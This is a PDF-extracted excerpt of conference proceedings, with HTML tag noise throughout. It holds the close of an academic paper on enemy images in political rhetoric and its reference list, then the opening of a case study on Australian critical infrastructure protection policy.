The western enemy differs significantly from the others, and is therefore discussed as the last. It is also<br />
much more modern that the previous three. From the po<strong>in</strong>t of view of the def<strong>in</strong>er/observer it is situated<br />
not below but above the Self. Accord<strong>in</strong>gly, it represents a super-culture. It has material superiority, large<br />
amounts of natural resources and/or a monopoly to exploit them, lots of money, high technology and<br />
superior, e.g. nuclear weapons.<br />
Dur<strong>in</strong>g the WW II the archetypal western enemy, at least from the perspective of Central and Eastern<br />
Europe, was the Nazi Germany, with its for a time seem<strong>in</strong>gly <strong>in</strong>surmountable resources, technological<br />
and armament superiority, accentuated by a certa<strong>in</strong> image of physical superiority result<strong>in</strong>g from a period<br />
of relative prosperity and put forth by means of <strong>in</strong>novative showmanship (e. g. Kershaw 2000, passim). In<br />
the post-war world the so-called Ugly American (orig<strong>in</strong>ally the title of a political novel by Eugene Burdick<br />
and William Lederer, published <strong>in</strong> 1958 and represent<strong>in</strong>g the arrogant behaviour of Americans abroad)<br />
came to stand for a person whose actions are motivated by selfish economic calculations, who disda<strong>in</strong>s<br />
all other cultures and practices than his own, and whose f<strong>in</strong>al aim is to put his own nation <strong>in</strong>to a position<br />
of world dom<strong>in</strong>ation.<br />
From a non-European perspective the colonial overlords (Said 1978: 1–28 and passim) and the presentday<br />
USA as the self-styled champion of democracy try<strong>in</strong>g to <strong>in</strong>duce disobedient nations to accept ‘our’<br />
values by force (Wuori 2002: 162–163) also represent the western enemy.<br />
4. Enemies with<strong>in</strong> the shared society: Sociological and politological cases<br />
The enemies whom Harle (2000:35) describes as <strong>in</strong>timate enemies are those who are considered aliens<br />
or outsiders by the def<strong>in</strong><strong>in</strong>g/observ<strong>in</strong>g <strong>in</strong>-group Self, but nevertheless live and act with<strong>in</strong> the same<br />
society. In the broad sense of the word they can be def<strong>in</strong>ed as political enemies. Accord<strong>in</strong>g to Carl<br />
Schmitt, a political movement comes <strong>in</strong>to be<strong>in</strong>g by identify<strong>in</strong>g (establish<strong>in</strong>g) an enemy, an outside group<br />
that is seen to threaten its very existence. Exclud<strong>in</strong>g a chosen Other is thus the found<strong>in</strong>g act of any<br />
political community. It enables the <strong>in</strong>-group to recognise its own identity, which of course is def<strong>in</strong>ed as an<br />
opposite of the enemy’s, <strong>in</strong> Schmitt’s vocabulary called a constitutive enemy (Schmitt 1996: 26–39, 46–<br />
47, 54, 64–68, 74, 79).<br />
Societal enemies from above and below date back for millennia, whereas the enemies from the right and<br />
the left – though orig<strong>in</strong>at<strong>in</strong>g as terms from the times of the 1789 French revolution – belong to the modern<br />
political maps of the19 th and 20 th centuries. The above/below divide is present also <strong>in</strong> the division of<br />
271
Marja Vuor<strong>in</strong>en<br />
society <strong>in</strong>to lower, middle and upper classes; the latter division <strong>in</strong>to three <strong>in</strong>cludes the central or middle<br />
group, which <strong>in</strong> the former is only implied at.<br />
An enemy from above is a liv<strong>in</strong>g paradox. It is represented as superior and quasi-<strong>in</strong>v<strong>in</strong>cible, but also, very<br />
pronouncedly, v<strong>in</strong>cible: beh<strong>in</strong>d its seem<strong>in</strong>g grandness looms qualitative <strong>in</strong>feriority. Its non-cultureness<br />
manifests as decadence and/or as a hyper-culture, e. g. accentuation of formalities. An enemy from<br />
above has, <strong>in</strong> the past, usurped the power, property and resources that rightfully belong to Us. Through<br />
them it has built itself a superior position. It oppresses Us and is haughty, arrogant, proud, snobbish and<br />
hierarchy-oriented. As a reactionary force it slows down the progress and maliciously disrupts the<br />
development towards ‘our’ chosen future.<br />
The classic case of an enemy from above is the 19 th -century nobleman, an icon of repressive mastership<br />
and political reaction – as portrayed by its rival and soon-to-be successors, the bourgeois professionals<br />
of the press. A conflict between the decl<strong>in</strong><strong>in</strong>g aristocracy and the upwardly mobile<br />
Bildungsbürgertum/<strong>in</strong>telligentsia was presented to the public as a conflict between nobility and the people<br />
(Vuor<strong>in</strong>en 2005a; Vuor<strong>in</strong>en 2010a; Taylor 2004). Another case <strong>in</strong> po<strong>in</strong>t is the made-to-order<br />
conglomerate enemy tailored for the emergent Soviet Union, consist<strong>in</strong>g of the imperial court, nobility,<br />
clergy, bourgeoisie and kulaks (Harle 2000: 111–117).<br />
Enemies from below stand literally lower than the spectator, and are by status non-cultural be<strong>in</strong>gs:<br />
unlearned or mentally slow, resembl<strong>in</strong>g a child, a savage or an animal. They disrespect ‘our’ hierarchies<br />
and norms, are listless, deceitful, defiant and demand<strong>in</strong>g, and enterta<strong>in</strong> big ideas about themselves. They<br />
covet ‘our’ status, power, property and education and try to wrench them from us, do not succumb to our<br />
guidance and dissociate themselves from our values. This category <strong>in</strong>cludes groups of low social orig<strong>in</strong><br />
who criticize an elite group for bad morals or poor adm<strong>in</strong>istration, e.g. popular religious revivals and<br />
grass-root-level democratic movements (Huhta 2001; Vuor<strong>in</strong>en 2005b: 251–252; Bränn 2004).<br />
The enemy from the right is related to an enemy from above. An enemy from above (right) tends to<br />
embody not only abstract societal power, as <strong>in</strong> the case of nobility, but also the more concrete economic<br />
power. The most recent historical case is the bourgeoisie of the 1960s-70s: the enemy of the leftist youth<br />
movements of the era. It was created by late-19 th- century Marxists, whose agitators urged the<br />
revolutionary workers to wrest power away from their masters, who deprived them of the fruits of their<br />
labour, happ<strong>in</strong>ess, rest and education (Ehrnrooth 1992: 127–189).<br />
The classical case of this enemy is the Whites of many early 20 th -century civil wars. The term ‘Whites’<br />
was not used quite as widely as ‘Reds’ to denote a political tendency, yet the pair figured not only <strong>in</strong><br />
Russian but also F<strong>in</strong>nish, Estonian and German civil wars. Otto-Ville Kuus<strong>in</strong>en, a F<strong>in</strong>nish communist,<br />
described the victorious Whites like this:<br />
In addition to the massacres, the bourgeoisie killed the prisoners [Red prison-camp <strong>in</strong>mates]<br />
also by lett<strong>in</strong>g them starve to death. For those god-fear<strong>in</strong>g monarchists and jo<strong>in</strong>t-stock<br />
company capitalists that was obviously the most orgiastic k<strong>in</strong>d of revenge: the workers,<br />
proud for their achievement as the generators of riches and thus their rightful owners, now<br />
imprisoned and writh<strong>in</strong>g <strong>in</strong> hunger, turn<strong>in</strong>g blue and breath<strong>in</strong>g their last. See<strong>in</strong>g this, the f<strong>in</strong>e<br />
lords of stock capital best can digest their fat, whet their appetite and revel <strong>in</strong> their<br />
superhuman power (quoted <strong>in</strong> Paavola<strong>in</strong>en 1967: 296–297).<br />
An enemy from the left relates to an enemy from below. The comb<strong>in</strong>ation enemy from below (left) is fairly<br />
common. All revolutionaries belong to this category. The F<strong>in</strong>nish 1918 Whites saw the Reds as ta<strong>in</strong>ted by<br />
ideological filth; communism was called a red epidemic. Their cruelty was emphasized by animal<br />
metaphors and graphic descriptions of rape and mutilation (Paavola<strong>in</strong>en 1966: 245–271; Vuor<strong>in</strong>en<br />
2005b: 253–255). White newspapers revelled <strong>in</strong> stories, heavily spiced with reversed religious<br />
symbolism, about how the Reds tortured country clergymen. One had been crucified on the altar. On the<br />
wall beh<strong>in</strong>d him was written, <strong>in</strong> blood, “May your God help you”. Another’s body was propped up with<br />
bayonets, eyes pierced, spectacles on and Bible <strong>in</strong> hand. A third had been first beaten senseless, then<br />
forced to watch as the Reds raped his wife and four daughters, and after burned along with his rectory<br />
(Paavola<strong>in</strong>en 1966: 251, 270).<br />
Other comb<strong>in</strong>ations of political compass po<strong>in</strong>ts are more problematic. Enemies from above (left) might be<br />
the youngsters of well-to-do families who <strong>in</strong> the 1960s and ‘70s rebelled aga<strong>in</strong>st the older generation<br />
parad<strong>in</strong>g picturesque leftist rhetoric. A 19 th -century case <strong>in</strong> po<strong>in</strong>t is the progressive nationalist-democratic<br />
272
Marja Vuor<strong>in</strong>en<br />
movement, proclaim<strong>in</strong>g for a time to be “of the people and for the people”, but soon land<strong>in</strong>g <strong>in</strong>to positions<br />
well above the people – and seen, by their opponents, to be sentimental, overly ideological and<br />
<strong>in</strong>competent.<br />
From below (right) come the mass movements of the extreme right: Nazis, fascists, Francoists. The<br />
comb<strong>in</strong>ation is embodied by the German Übermensch, whose physical superiority comb<strong>in</strong>es discipl<strong>in</strong>e<br />
and subord<strong>in</strong>ation of the <strong>in</strong>dividual to the whole. A hallmark of this mentality is the uniform, hid<strong>in</strong>g an<br />
<strong>in</strong>dividual <strong>in</strong>to a multiplicity, dramatis<strong>in</strong>g mass scale and unity (Paavola<strong>in</strong>en 1975: 254–270).<br />
5. Internal enemies: shirkers and traitors<br />
The most unpredictable and therefore the most suspicious enemies are those, who by their looks and<br />
manners cannot be separated from Us, who hide among Us and whom we treat as one of Us – but who<br />
may eventually betray us and thus, from the beg<strong>in</strong>n<strong>in</strong>g, were not worth our trust.<br />
The risks caused by <strong>in</strong>ternal enemies are at their direst dur<strong>in</strong>g war-time, when the contribution of every<br />
citizen is needed to defend the nation. War-time freeloaders and troublemakers – those who fail to do<br />
their duty while others risk their lives – can be divided <strong>in</strong>to further categories, <strong>in</strong>clud<strong>in</strong>g compla<strong>in</strong>ers,<br />
shirkers, mut<strong>in</strong>eers and deserters with<strong>in</strong> the ranks of the army, defeatists who weaken the morale on the<br />
home front and profiteers who unscrupulously exploit the war economy. The cross-border, fifth-column<br />
forms of desertion <strong>in</strong>clude treason and collaboration with the enemy, while a domestic treason typically<br />
manifests as revolt (Vuor<strong>in</strong>en 2010b). A special subtype of sexual treason is committed by ‘Our women’<br />
who jeopardize the moral of the nation by consort<strong>in</strong>g with the enemy; e.g. <strong>in</strong> France after the WW II many<br />
‘brides of the Germans’ were publicly punished (Karemaa 1998:, 23–24, 66–67; Junila 2000; 146–165;<br />
Virgili 2002).<br />
Internal enemies come also <strong>in</strong> peacetime varieties. Those <strong>in</strong>capable to carry full responsibility, known as<br />
weak l<strong>in</strong>ks, put the survival of the group, e. g. nation at peril. Morally slack, mentally ill, disabled and<br />
alcohol abusers were often condemned as public enemies by the social reformists of the late 19 th and<br />
early 20 th century (Uimonen 1999; Mattila 2005). Peacetime freeloaders are those who choose not to<br />
work; an <strong>in</strong>dustrious sub-species of this type is the speculator who benefits from the work of others. The<br />
civilian shirkers come <strong>in</strong> two varieties: those who won’t pay taxes but exploit the social benefits and those<br />
who by their choices <strong>in</strong>crease the commonwealth’s health-care expenses: alcoholics, drug addicts,<br />
tobacco smokers and obese exercise-avoidants. Far more perilous are the peacetime traitors, who<br />
violate the bonds of law and loyalty: crim<strong>in</strong>als and terrorists. Dur<strong>in</strong>g racist regimes, those who consorted<br />
with home-grown “racial <strong>in</strong>feriors” could be condemned as traitors of their race (Vuor<strong>in</strong>en 2010b).<br />
6. Temporal and eternal enemies: Religion and history<br />
The theological division <strong>in</strong>to heaven and hell will not be discussed here, even though it is considered by<br />
some as the core of all rhetoric on good versus evil (Harle 2000: 25–39). Suffice it to note that religious<br />
identities have, for millennia, provided an ultimate criterion of division between Us and Them.<br />
In modern secular discourse the division <strong>in</strong>to heaven/hell is sometimes replaced by a sequence of<br />
past/present/future. By demonis<strong>in</strong>g the past the present circumstances can be represented as optimal,<br />
normal and natural, whereas any diversion from them can be <strong>in</strong>terpreted as harmful and unnatural.<br />
Alternate ways to deal with this sequence are the optimistic model, that demonises not only the past but<br />
also and most particularly the present, and places the better prospects <strong>in</strong>to a utopian future, and the<br />
pessimistic, reactionary notion of the past as a golden age, <strong>in</strong> turn demoniz<strong>in</strong>g the impend<strong>in</strong>g future.<br />
References<br />
Alapuro, R. (1973) Akateem<strong>in</strong>en Karjala-seura: ylioppilasliike ja kansa 1920- ja 1930-luvulla, WSOY, Porvoo.<br />
Blair, T. (2001) “Blair calls for world fight aga<strong>in</strong>st terror”, <strong>in</strong> Guardian, 12 September 2001<br />
(http://www.guardian.co.uk/politics/2001/sep/12/uk.september11).<br />
Bränn, M. (2004) ”Axel Olof Freudenthal och den Nyländska avdeln<strong>in</strong>gens värdeorienter<strong>in</strong>g.” Ahl & Bränn<br />
(eds.)1904: Saml<strong>in</strong>gar utgivna av Nylands Nation XIII, Nylands Nation, Hels<strong>in</strong>gfors, pp. 20–49.<br />
Ehrnrooth, J. (1992) Sanan vallassa, vihan voimalla: sosialistiset vallankumousopit ja niiden vaikutus Suomen<br />
työväenliikkeessä 1905–1914, SHS, Hels<strong>in</strong>ki.<br />
Gummerus, K.J. (1970) Ylhäiset ja alhaiset, Gummerus, Jyväskylä.<br />
Hall, S. (1999) Identiteetti, Vastapa<strong>in</strong>o, Tampere.<br />
Harle, V. (2000) The enemy with a thousand faces: the tradition of the other <strong>in</strong> western political thought and history,<br />
Praeger, Westport (Conn.).<br />
273
Marja Vuor<strong>in</strong>en<br />
Huhta, I. (2001) ”Täällä on oikea suomenkansa”: körttiläisyyden julkisuuskuva 1880–1918, Suomen<br />
kirkkohistoriall<strong>in</strong>en seura, Hels<strong>in</strong>ki.<br />
Immonen, K. (1987) Ryssästä saa puhua… Neuvostoliitto suomalaisessa julkisuudessa ja kirjat julkisuuden muotona<br />
1918–39, Otava, Hels<strong>in</strong>ki.<br />
Junila, M. (2000) Kotir<strong>in</strong>taman aseveljeyttä: suomalaisen siviiliväestön ja saksalaisen sotaväen r<strong>in</strong>nakka<strong>in</strong>elo<br />
Pohjois-Suomessa 1941–1944, SHS, Hels<strong>in</strong>ki.<br />
Kailas, U. (1977) Runoja, WSOY, Porvoo.<br />
Karemaa, O. (1998) Vihollisia, va<strong>in</strong>oojia, syöpäläisiä: venäläisviha Suomessa 1917–1923, SHS, Hels<strong>in</strong>ki.<br />
Kershaw, I. (2000), Hitler, 1936–45: Nemesis. Pengu<strong>in</strong>, London.<br />
Kl<strong>in</strong>ge, M. (1972) ”Vihan veljistä” valtiososialismi<strong>in</strong>: yhteiskunnallisia ja kansallisia näkemyksiä 1910- ja 1920-luvuilta,<br />
WSOY, Porvoo.<br />
Kuusisto, R. (2002). ”Ei mitään hätää! Terrorism<strong>in</strong> vastaisen sotamme ’virhetulk<strong>in</strong>nat’ ja ’oikeat perustelut’.” First we<br />
take Manhattan – terrorismi ja uusi maailmanjärjestys, Like, Hels<strong>in</strong>ki, pp. 71–82.<br />
Luostar<strong>in</strong>en, H. (1986) Periviholl<strong>in</strong>en: Suomen oikeistolehdistön Neuvostoliittoa koskeva viholliskuva sodassa 1941–<br />
44: tausta ja sisältö, Vastapa<strong>in</strong>o, Tampere.<br />
Mattila, M. (2005) Sterilo<strong>in</strong>tipolitiikka ja romanit Suomessa vuos<strong>in</strong>a 1950–1970. Häkk<strong>in</strong>en & al. (eds.), Vieraat kulkijat<br />
– tutut talot: näkökulmia etnisyyden ja köyhyyden historiaan Suomessa, SKS, Hels<strong>in</strong>ki.<br />
Mosca, G. (1939). The rul<strong>in</strong>g class: elementi di scienza politica (1896), McGraw-Hill, New York.<br />
Paavola<strong>in</strong>en, J. (1966, 1967) Poliittiset väkivaltaisuudet Suomessa 1918 I–II, Tammi, Hels<strong>in</strong>ki.<br />
Paavola<strong>in</strong>en, O. (1975/1936) Kolmannen valtakunnan vieraana, Otava, Hels<strong>in</strong>ki.<br />
Said, E. (1978) Orientalism. Pantheon Books. New York:<br />
Schivelbusch, W. (2004) The culture of defeat: on national trauma, mourn<strong>in</strong>g, and recovery, Granta, London.<br />
Tarkia<strong>in</strong>en, K. (1986) Se vanha va<strong>in</strong>ooja: käsitykset itäisestä naapurista Iivana Julmasta Pietari Suureen, SHS,<br />
Hels<strong>in</strong>ki.<br />
Taylor, A. (2004) Lords of Misrule: Hostility to Aristocracy <strong>in</strong> Late N<strong>in</strong>eteenth- and Early Twentieth-Century Brita<strong>in</strong>,<br />
Palgrave Macmillan, Bas<strong>in</strong>gstoke.<br />
Uimonen, M<strong>in</strong>na (1999). Hermostumisen aikakausi: Neuroosit 1800- ja 1900-lukujen vaihteen suomalaisessa<br />
lääketieteessä, SHS, Hels<strong>in</strong>ki.<br />
Virgili, F. (2002). Shorn women: gender and punishment <strong>in</strong> liberation France, Berg, Oxford & New York.<br />
Vuor<strong>in</strong>en, M. (2005a) “Invent<strong>in</strong>g an Enemy: Bloodsuck<strong>in</strong>g Noblemen <strong>in</strong> F<strong>in</strong>nish Fiction.” H. Salmi (ed.), History <strong>in</strong><br />
Words and Images. Proceed<strong>in</strong>gs of the Conference on Historical Representation, Turku, pp. 109–121.<br />
http://www.hum.utu.fi/historia/2000/<br />
Vuor<strong>in</strong>en, M. (2005b). ”Herrat, hurrit ja ryssän kätyrit – suomalaisuuden vastakuvia.” Pakkasvirta & Saukkonen<br />
(eds.), Nationalismit, WSOY, Hels<strong>in</strong>ki, pp. 246–264.<br />
Vuor<strong>in</strong>en, M. (2010a) Kuviteltu aatelismies: aateluus viholliskuvana ja itseymmärryksenä 1800-luvun Suomessa,<br />
Hels<strong>in</strong>ki, SKS.<br />
Vuor<strong>in</strong>en, M. (2010b) ”Me<strong>in</strong> Kampf revisited: enemy images as <strong>in</strong>versions of the Self” <strong>in</strong> D. Remenyi (ed.)<br />
Proceed<strong>in</strong>gs of the 9th European conference on <strong>in</strong>formation warfare and security. <strong>Academic</strong> <strong>Conferences</strong><br />
<strong>Limited</strong>, Read<strong>in</strong>g.<br />
Wuori, M. (2002) ”Maailma järjestyksen kourissa.” First we take Manhattan: terrorismi ja uus<strong>in</strong> maailmanjärjestys,<br />
Like, Hels<strong>in</strong>ki, pp. 152–172.<br />
Zilliacus, V. (1989) Rakas vanha Eurooppa: kulttuurikuvia vuosisatojen varrelta, Tammi, Hels<strong>in</strong>ki.<br />
274
Australian National Critical Infrastructure Protection: A Case<br />
Study<br />
Matthew Warren and Shona Leitch<br />
Deak<strong>in</strong> University, Australia<br />
mwarren@deak<strong>in</strong>.edu.au<br />
shona@deak<strong>in</strong>.edu.au<br />
Abstract: Australia has developed sophisticated national security policies and physical security agencies to protect<br />
aga<strong>in</strong>st current and future security threats associated with critical <strong>in</strong>frastructure protection and cyber warfare<br />
protection. This paper will discuss some of the common security risks that face Australia and how their government<br />
policies and strategies have been developed and changed over time, for example, the proposed Australian<br />
Homeland <strong>Security</strong> department. This paper will discuss the different steps that Australia has undertaken <strong>in</strong> relation to<br />
develop<strong>in</strong>g national policies to deal with critical <strong>in</strong>frastructure protection.<br />
Keywords: critical <strong>in</strong>frastructure, Australia and policy<br />
1. Introduction<br />
Australia is a modern society and is highly dependent on key critical systems at the national and state<br />
level. These key systems have become more dom<strong>in</strong>ant as the Information Age has developed. These<br />
key systems are grouped together and described as critical <strong>in</strong>frastructure; this is <strong>in</strong>frastructure so vital<br />
that its <strong>in</strong>capacity or destruction would have a debilitat<strong>in</strong>g impact on defence and national security (Lewis,<br />
2006). Many of these critical systems are based upon ICT (Information and Communication Technology)<br />
systems.<br />
Australia takes ICT security very seriously, it has been estimated that Australian organisations spend<br />
between A$1.37 – A$1.74 billion per year on IT security, and the total f<strong>in</strong>ancial losses due to computerrelated<br />
security <strong>in</strong>cidents <strong>in</strong> the 2006 f<strong>in</strong>ancial year have been estimated to be between $595 and $649<br />
million (Australian Institute of Crim<strong>in</strong>ology, 2009).<br />
This paper will review the current strategies used by Australia over a decade and evaluate their<br />
differences and discuss the reasons for these differences. Future threats such as Cyber Warfare and the<br />
steps that are be<strong>in</strong>g proposed will be considered. This paper will highlight current Australian best<br />
practices <strong>in</strong> critical <strong>in</strong>frastructure and cyber warfare protection many of which may be applicable <strong>in</strong> a<br />
European context and provide an <strong>in</strong>formative contrast.<br />
2. The <strong>in</strong>itial view of the Australian Federal Government<br />
The <strong>in</strong>itial focus of the Australian Federal Government policy was that critical <strong>in</strong>frastructure protection<br />
was a commercial consideration and related to Information <strong>Security</strong> (Busuttil and Warren, 2004).The<br />
Australian Federal Government has been aware of the problems that Australian corporations may have<br />
with deal<strong>in</strong>g with these new security issues. The Australian Federal Government has responded by<br />
offer<strong>in</strong>g advice for corporations. The <strong>in</strong>itial Australian Government advice (AGD, 1998) suggested ways <strong>in</strong><br />
which organisations could reduce Critical Infrastructure Protection risks (Busuttil and Warren, 2004):<br />
Organisations should implement protective security such as passwords etc <strong>in</strong> accordance to a<br />
def<strong>in</strong>ed security standard such as AS/NZS 4444 (Now 17799) (Information <strong>Security</strong> Management);<br />
Organisations should formally accredit themselves aga<strong>in</strong>st security standards such as AS/NZS 4444<br />
(17799);<br />
Organisations should raise awareness of security issues such as password security, E-commerce<br />
risks among their staff;<br />
Organisations should tra<strong>in</strong> their staff <strong>in</strong> how to use computer security systems efficiently and<br />
effectively.<br />
This advice was subsequently updated and <strong>in</strong> 2004 the Australian Government responded with new<br />
security advice (Australian Government, 2004):<br />
The Australian and New Zealand Standard for Risk Management AS/NZS 4360:1999 is the standard<br />
by which all critical <strong>in</strong>frastructure will be assessed to assist with the review of risk management plans<br />
for prevention (<strong>in</strong>clud<strong>in</strong>g security), preparedness, response and recovery (PPRR).<br />
275
Matthew Warren and Shona Leitch<br />
In 2004 the Australian Federal Government formally def<strong>in</strong>ed the follow<strong>in</strong>g; “Critical <strong>in</strong>frastructure is<br />
def<strong>in</strong>ed as those physical facilities, supply cha<strong>in</strong>s, <strong>in</strong>formation technologies and communication networks<br />
which, if destroyed, degraded or rendered unavailable for an extended period, would significantly impact<br />
on the social or economic well-be<strong>in</strong>g of the nation, or affect Australia's ability to conduct national defence<br />
and ensure national security” (Australian Government, 2004). In essence this description describes<br />
organisations that exist at a government level or at a corporate level (Australian Government, 2004).<br />
Historically, much of Australia’s <strong>in</strong>frastructure was orig<strong>in</strong>ally owned and operated by the public sector at<br />
the federal, state and local government levels (Smith, 2004) however the majority of Australia’s critical<br />
<strong>in</strong>frastructure has now been privatised and is under private sector ownership. Consequently, protect<strong>in</strong>g<br />
Australia’s critical <strong>in</strong>frastructure now requires a higher level of cooperation between all levels of<br />
government and the private sector owners. Hence, the federal government has developed a policy for<br />
critical <strong>in</strong>frastructure protection that focuses broadly on address<strong>in</strong>g the follow<strong>in</strong>g strategies (Australian<br />
Government, 2004; AGD, 2004):<br />
Dist<strong>in</strong>guish<strong>in</strong>g critical <strong>in</strong>frastructures and ascerta<strong>in</strong><strong>in</strong>g the risk areas;<br />
Align<strong>in</strong>g the strategies for reduc<strong>in</strong>g potential risk to critical <strong>in</strong>frastructure;<br />
Encourag<strong>in</strong>g and develop<strong>in</strong>g effective partnerships with state and territory governments and the<br />
private sector;<br />
Advanc<strong>in</strong>g both domestic and <strong>in</strong>ternational best practice for critical <strong>in</strong>frastructure protection.<br />
As Warren and Leitch discussed (Warren and Leitch, 2010), the Australian Federal Government<br />
recognised the importance of crucial systems and the development of new <strong>in</strong>dustry support mechanisms,<br />
<strong>in</strong> particular Trusted Information Shar<strong>in</strong>g Network (TISN).<br />
The TISN is a forum <strong>in</strong> which the owners and operators of critical <strong>in</strong>frastructure work together by shar<strong>in</strong>g<br />
<strong>in</strong>formation on security issues which affect critical <strong>in</strong>frastructure (TISN, 2007). TISN requires the active<br />
participation of Critical <strong>in</strong>frastructure Protection owners and operators of Critical <strong>in</strong>frastructure Protection,<br />
regulators, professional bodies and <strong>in</strong>dustry associations, <strong>in</strong> cooperation with all levels of government,<br />
and the public. To ensure this cooperation and coord<strong>in</strong>ation, all of these participants should commit to the<br />
follow<strong>in</strong>g set of common fundamental pr<strong>in</strong>ciples of Critical <strong>in</strong>frastructure Protection (TISN, 2007). These<br />
pr<strong>in</strong>ciples are (TISN, 2007, Warren and Leitch, 2010):<br />
Critical <strong>in</strong>frastructure Protection is centred on the need to m<strong>in</strong>imise risks to public health, safety and<br />
confidence, ensure economic security, ma<strong>in</strong>ta<strong>in</strong> Australia’s <strong>in</strong>ternational competitiveness and ensure<br />
the cont<strong>in</strong>uity of government and its services;<br />
The objectives of Critical <strong>in</strong>frastructure Protection are to identify critical <strong>in</strong>frastructure, analyse<br />
vulnerability and <strong>in</strong>terdependence, and protect from, and prepare for, all hazards;<br />
As not all critical <strong>in</strong>frastructure can be protected from all threats, appropriate risk management<br />
techniques should be used to determ<strong>in</strong>e relative severity and duration, the level of protective security,<br />
set priorities for the allocation of resources and the application of the best mitigation strategies for<br />
bus<strong>in</strong>ess cont<strong>in</strong>uity;<br />
The responsibility for manag<strong>in</strong>g risk with<strong>in</strong> physical facilities, supply cha<strong>in</strong>s, <strong>in</strong>formation technologies<br />
and communication networks primarily rests with the owners and operators;<br />
Critical <strong>in</strong>frastructure Protection needs to be undertaken from an 'all hazards approach' with full<br />
consideration of <strong>in</strong>terdependencies between bus<strong>in</strong>esses, sectors, jurisdictions and government<br />
agencies;<br />
Critical <strong>in</strong>frastructure Protection requires a consistent, cooperative partnership between the owners<br />
and operators of critical <strong>in</strong>frastructure and governments;<br />
The shar<strong>in</strong>g of <strong>in</strong>formation relat<strong>in</strong>g to threats and vulnerabilities will assist governments, and owners<br />
and operators of critical <strong>in</strong>frastructure to better manage risk;<br />
Care should be taken when referr<strong>in</strong>g to national security threats to critical <strong>in</strong>frastructure, <strong>in</strong>clud<strong>in</strong>g<br />
terrorism, so as to avoid undue concern <strong>in</strong> the Australian domestic community, as well as potential<br />
tourists and <strong>in</strong>vestors overseas;<br />
Stronger research and analysis capabilities can ensure that risk mitigation strategies are tailored to<br />
Australia’s unique critical <strong>in</strong>frastructure circumstances.<br />
276
Matthew Warren and Shona Leitch<br />
3. Australia’s critical <strong>in</strong>frastructure – the alternative view po<strong>in</strong>t<br />
Dur<strong>in</strong>g the time that the Australian Federal Government def<strong>in</strong>ed National Policy for Critical Infrastructure<br />
Protection, the opposition Australian Labor Party def<strong>in</strong>ed their own very different policy and viewpo<strong>in</strong>t.<br />
The follow<strong>in</strong>g is a time sequence of their policy development:<br />
2001- Initial Policies<br />
In October 2001, as a response to the act of terrorism <strong>in</strong> New York <strong>in</strong> September of the same year, the<br />
Australian Labor Party (ALP) which was the Australian opposition of the time led by Kim Beazley<br />
proposed a range of national security reforms. The reforms focussed on three ma<strong>in</strong> areas (ALP, 2001):<br />
Improv<strong>in</strong>g border security;<br />
Combat<strong>in</strong>g terrorism;<br />
Improv<strong>in</strong>g national security plann<strong>in</strong>g.<br />
It was stated that these reforms were previously <strong>in</strong> the plann<strong>in</strong>g stages but the first announcement was<br />
made only two days after the attack on the World Trade Center. Australia’s border security was<br />
announced by them as a high priority with changes to the coast guard and aviation security regimes<br />
upmost. In terms of the aviation <strong>in</strong>dustry this <strong>in</strong>cluded more counter-terrorism measures <strong>in</strong>clud<strong>in</strong>g the<br />
Federal Government tak<strong>in</strong>g over responsibility for all airport security checks, mak<strong>in</strong>g sure there is a<br />
visible presence of officers at airports and <strong>in</strong>troduc<strong>in</strong>g tighter controls on aviation security <strong>in</strong>formation by<br />
amend<strong>in</strong>g current laws and regulations (ALP, 2001).<br />
Rather than just concentrat<strong>in</strong>g on the physical security controls which were very much <strong>in</strong> the forefront of<br />
the public’s m<strong>in</strong>d <strong>in</strong> 2001, the ALP also proposed a range of changes and <strong>in</strong>itiatives <strong>in</strong> regards to<br />
protect<strong>in</strong>g Australia’s national <strong>in</strong>frastructure. This focused <strong>in</strong> on the establishment of a Defence Cyberwarfare<br />
Task Force which would use all the elements and agencies of the current defence force to<br />
counteract cyber security threats and cyber terrorism attacks.<br />
This strategy proposed by the ALP revolved around the concept of “Homeland <strong>Security</strong>”, this was the first<br />
time this term was used <strong>in</strong> Australia and the notion of <strong>in</strong>tegrat<strong>in</strong>g security agencies, expand<strong>in</strong>g the range<br />
of activities and <strong>in</strong>clud<strong>in</strong>g the national <strong>in</strong>frastructure (transport, electricity, water, communication systems<br />
etc) as the most important elements was a dramatic leap <strong>in</strong> the protection of Australia from cyber terrorist<br />
threats.<br />
2003 – 2005 – A Period of Reflection<br />
In 2003, the Australian Labor Party was still the countries opposition party. The department of Homeland<br />
<strong>Security</strong> was still be<strong>in</strong>g advocated by them, so much so that an opposition <strong>Security</strong> m<strong>in</strong>ister was created<br />
whose portfolio encompassed border protection, crime prevention, <strong>in</strong>telligence-gather<strong>in</strong>g, <strong>in</strong>vestigation<br />
and prosecution (ALP, 2003) and they set up the Shadow Department of Homeland <strong>Security</strong> Portfolio.<br />
In 2005 the notion of a Homeland <strong>Security</strong> department was still forefront <strong>in</strong> the ALP’s policies as a way to<br />
address the issues of national security and br<strong>in</strong>g together all of Australia’s defence agencies (as was<br />
done dur<strong>in</strong>g the 2000 Olympic Games held <strong>in</strong> Sydney, Australia). They believed that this level of<br />
<strong>in</strong>tegration and cohesion was the only way to truly protect Australia and its citizens from the cont<strong>in</strong>ued<br />
threats and attacks. They outl<strong>in</strong>ed a number of cases which they felt supported this proposal (Beazley,<br />
2005):<br />
The alleged <strong>in</strong>volvement of Sydney Airport baggage handlers <strong>in</strong> an <strong>in</strong>ternational drug traffick<strong>in</strong>g<br />
syndicate. The Australian Federal Police claims baggage handlers were key players <strong>in</strong> a conspiracy<br />
to smuggle coca<strong>in</strong>e worth $15 million <strong>in</strong>to Australia;<br />
Constant warn<strong>in</strong>gs from the Transport Workers’ Union, that the Federal government had been aware<br />
of potential security breaches at Australian airports for at least four years and the TWU’s call for<br />
improved security checks of short term employees and the immediate x-ray screen<strong>in</strong>g of all baggage<br />
and freight;<br />
Passengers’ baggage conta<strong>in</strong><strong>in</strong>g large amounts of narcotics be<strong>in</strong>g diverted to domestic carousels to<br />
avoid Customs <strong>in</strong>spections;<br />
277
Matthew Warren and Shona Leitch<br />
39 security screeners out of 500 employed at the airport have serious crim<strong>in</strong>al convictions, with a<br />
further 39 convicted of m<strong>in</strong>or matters;<br />
Eng<strong>in</strong>eers with unauthorised duplicate keys;<br />
Lack of customs checks on airl<strong>in</strong>e staff.<br />
2007 – 2008 From Opposition to Government<br />
The Australian Labor Party <strong>in</strong> 2007 had moved from be<strong>in</strong>g the opposition party to form<strong>in</strong>g Government.<br />
One of their ma<strong>in</strong> policies lead<strong>in</strong>g <strong>in</strong>to the Federal election was that they would cont<strong>in</strong>ue with their long<br />
term plan of form<strong>in</strong>g a Department of Homeland <strong>Security</strong>.<br />
